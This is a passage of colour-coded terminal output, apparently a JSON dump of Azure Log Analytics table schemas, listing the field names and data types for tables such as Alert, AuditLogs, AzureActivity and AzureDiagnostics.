\u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserIdentityAccessKeyId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserIdentityAccountId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserIdentityArn\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserIdentityInvokedBy\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserIdentityPrincipalid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserIdentityType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserIdentityUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VpcEndpointId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"Alert\"\u001b[39;49;00m: {\n        \u001b[94m\"AlertContext\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertError\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertPriority\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertRuleId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertRuleInstanceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertSeverity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertState\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertStatus\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"AlertTypeDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertTypeNumber\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"AlertValue\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"Comments\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom1\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom10\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom2\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom3\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom4\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom5\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom6\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom7\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom8\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom9\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Expression\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Flags\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"FlagsDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HostName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LastModifiedBy\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LinkToSearchResults\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PriorityNumber\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"Query\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QueryExecutionEndTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"QueryExecutionStartTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"RemediationJobId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemediationRunbookName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RepeatCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ResolvedBy\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RootObjectName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceDeskConnectionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceDeskId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceDeskWorkItemLink\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceDeskWorkItemType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceFullName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StateType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StatusDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TemplateId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ThresholdOperator\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ThresholdValue\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TicketId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeLastModified\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeRaised\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeResolved\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TriggerId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Url\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ValueDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ValueFlags\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ValueFlagsDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AppCenterError\"\u001b[39;49;00m: {\n        \u001b[94m\"Annotation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CreatedAt\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorClass\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorFile\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorGroupId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorLine\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorMethod\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorReason\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExceptionType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"JailBreak\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"LastErrorAt\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Model\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Oem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OsVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SchemaType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Status\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SymbolicatedAt\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserString\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AuditLogs\"\u001b[39;49;00m: {\n        \u001b[94m\"AADOperationType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AADTenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActivityDateTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"ActivityDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AdditionalDetails\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DurationMs\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"Id\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"InitiatedBy\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Location\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LoggedByService\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Resource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Result\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultReason\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultSignature\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetResources\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AutoscaleEvaluationsLog\"\u001b[39;49;00m: {\n        \u001b[94m\"AutoscaleMetricName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AvailabilitySet\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CloudServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CloudServiceRole\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CoolDown\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CurrentInstanceCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DefaultInstanceCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DeploymentSlot\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EstimateScaleResult\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EvaluationResult\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EvaluationTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"InstanceUpdateReason\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LastScaleActionOperationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LastScaleActionOperationStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LastScaleActionTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"MaximumInstanceCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"MetricData\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MetricEndTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"MetricNamespace\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MetricStartTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"MetricTimeGrain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MinimumInstanceCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"NewInstanceCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ObservedValue\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Operator\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Profile\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProfileEvaluationTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"ProfileSelected\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"Projection\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SelectedAutoscaleProfile\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServerFarm\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ShouldUpdateInstance\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"SkipCurrentAutoscaleEvaluation\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"SkipRuleEvaluationForCooldown\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Threshold\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"TimeAggregationType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGrainStatistic\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeWindow\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Webspace\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AutoscaleScaleActionsLog\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CreatedAsyncScaleActionJob\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"CreatedAsyncScaleActionJobId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CurrentInstanceCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"NewInstanceCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ScaleActionMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ScaleActionOperationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ScaleActionOperationStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ScaleDirection\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AzureActivity\"\u001b[39;49;00m: {\n        \u001b[94m\"ActivityStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActivityStatusValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActivitySubstatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActivitySubstatusValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Authorization\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Caller\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallerIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CategoryValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventSubmissionTimestamp\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"HTTPRequest\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationNameValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Properties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Resource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProviderValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubscriptionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AzureDiagnostics\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RawData\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Resource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubscriptionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_schema_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"code_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"correlation_actionTrackingId_g\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"correlation_clientTrackingId_g\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"correlation_clientTrackingId_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"endTime_t\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"error_code_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"error_message_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_actionName_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_location_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_originRunId_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_resourceGroupName_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_runId_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_subscriptionId_g\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_triggerName_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_workflowId_g\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_workflowName_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        